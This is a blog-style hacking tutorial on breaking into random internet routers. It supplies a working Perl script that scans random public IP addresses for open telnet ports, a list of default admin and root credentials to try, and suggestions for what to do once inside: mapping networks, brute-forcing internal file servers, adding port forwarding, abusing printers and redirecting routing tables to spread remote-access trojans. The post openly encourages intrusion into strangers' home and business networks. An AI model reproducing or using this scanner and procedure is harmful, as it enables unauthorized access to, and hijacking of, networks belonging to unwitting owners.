Hack Router For Exploration

·

EMOTE ROUTER HACKING
Introduction
In my previous posts i have explained how to hack PC using IP address and how to hack someone's PC using NMAP(Networking Tool). In this post i will explain about router hacking. OK, Basically this tutorial deals with how to scan large amounts of addresses for telnet services, which we can then attempt to use default credentials to log in with surprising success.

Why Telnet? Isn't That Dead Now?
Your partly correct, telnet is dead now, it was superseded by SSH because telnet sends packets in plain text where as SSH encrypts packets. But telnet is still very much used on routers for simple administration by low tech management systems that come packaged with a lot of off the shelf routers. Some of these routers allow remote clients to connect to telnet as well as local users - these are the boxes that we are looking for.

So what do i need ?
You'll need to run this Perl script, (written by me, found below), this simply generates a random IP address, if the IP is in a scannable class (ie not a private, experimental or loop back address) the program attempts to open a connection to the telnet port (23) of the random ip, if it succeeds the program logs the success in a local file for later analysis. The program then repeats -- so if you run a few instances of the program for a few hours you can end up with a list of around 200 telnet servers - i have left mine overnight before and collected 880 servers before.




Code:
#!/usr/bin/perl
use IO::Socket;
########################### IP GENERATOR ########################
sub ipgen(){
my $range1 = 223;                        #avoid experimental and multicast
my $range2 = 254;        
$oct1 = int(rand($range1)) + 1;                    #generate random octets
$oct2 = int(rand($range2)) + 1;
$oct3 = int(rand($range2)) + 1;
$oct4 = int(rand($range2)) + 1;

if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips
$ip = &ipgen();                            #if local or private call again
}else{
$ip = "$oct1.$oct2.$oct3.$oct4";                # otherwise allocate the ip to return
}
return $ip;                            #return to caller
}
#################################################################
############################## MAIN #############################
print "########################################\n";
print "#---------Random Telnet Scanner--------#\n";
print "#-----------Written by 50LaR15---------#\n";
print "########################################\n";
while(1==1){                            # keeps code running indefinately
$target = &ipgen();                        # get random ip to scan
print "*??* SCANNING: $target \n";                    # output
my $sock = new IO::Socket::INET (                # try to create socket to chose random address
                 PeerAddr => $target,
                 PeerPort => '23',        # change this number to change ports you want to detect
                 Proto => 'tcp',
                 Timeout => '3',         # you can get away with a timeout of 1 second but i have 2 to be safe
                 );
if($sock){                            # if socket opened (port open)
print "*!!* SUCCESS-: $target \n";                # print to screen
open(DAT, ">>telnet.txt") || die("Cannot Open Output File");     # open results file
print DAT "SUCCESS: $target \n";                # append findings to end of file
close(DAT);                            # close the file
}
close($sock);                            # close the socket
}################################################################

You'll also need need a telnet client - I recommend you use putty because it supports proxy's  but you are dealing with people who don't know how to change there router passwords so you shouldn't be too worried so you can use the default OS telnet client - for windows XP/linux users you will already have one - for windows 7 users you will need to enable yours.

Ok - I'm Set Up - So Now What?
You'll need to start a few instances of the Perl script, you can make your desktop look pretty like mine below if you wish.

[Image: 4185786.png]

You can just run one but it will take longer to get a decent sized list of servers. I run 5 for around half an hour and that gives me a list of around 50 telnet boxes.

OK now you have your list of IP's with the telnet port open (called telnet.txt in the same directory as your Perl script), what you need to do is take your telnet client and just start connecting to them, - you will be prompted for a username + password.

This is where it gets fun - because a large amount of routers ship with default accounts - here are the most common.

Username:Password
_________________
admin : admin
admin : (blank password)
root : (blank)
root : root

To be honest a lot of routers disclose there model number in the telnet banner when you connect so a simple Google search often turns up the default username and password. Otherwise i try the top 3 and usually get disconnected and move on to the next in my list.

You will find out quiet fast how many ip's in your list you can actually log into with full admin rights

[Image: 4185900.png]
Who Exactly Am I Hacking?
This is half the fun for me - you don't really know - if your interested you can just do a quick whois -but around 90% of the time your dealing with home routers that people have bought from a shop and not configured properly but i have found business and offices that have succumb to the same laziness as the home user so the possibilities are endless.

Ok now what ?
From here its up to you what you do, but i enjoy using simple network tools like ipconfig and ping to map out the network, sometimes i have found routers that have nmap and telnet clients on etc. Today i found one that let me download any C code onto it i wanted - almost every router OS is different so some take a while to get used to what commands you can run but it is a lot of fun finding out peoples network layout, i have compromised routers, made my way into the internal file servers of the network using brute forcers, or setting up port forwarding on the router to give me access externally to otherwise private internal resources - you can even port forward packets to printers and use them across the internet to print out hundreds of copies of the dictionary or what ever literature tickles your pickle.

A funny concept that i have got to work in the past is fucking with the routing tables and redirecting every web request to gay porn sites. So I would imagine that this could be useful for people trying to get RAT's spread, especially if you find a router with upwards of 100 PC's behind the router - but i don't deal much with rat's and botnets so don't quote me on that.

A Small Aside.

Ill be happy if a few people read this tutorial and explore a few networks because that's what used to drive hacking forwards, and its what used to motivate hackers, the thrill of exploring the unknown, the chance of coming across a really large network to explore and further your knowledge and skills of systems. I think people focus too much on making money from hacking, or getting there best friends fu**book password and the real fun somehow has been lost in the past 10 years to a new generation of kids that just want everything now. Lets keep some of the old skills and knowledge alive and not let it be lost in the archives of long since abandoned forums and irc rooms.

0 comments:

Related Posts Plugin for WordPress, Blogger...

Contact Form

Name

Email *

Message *

Followers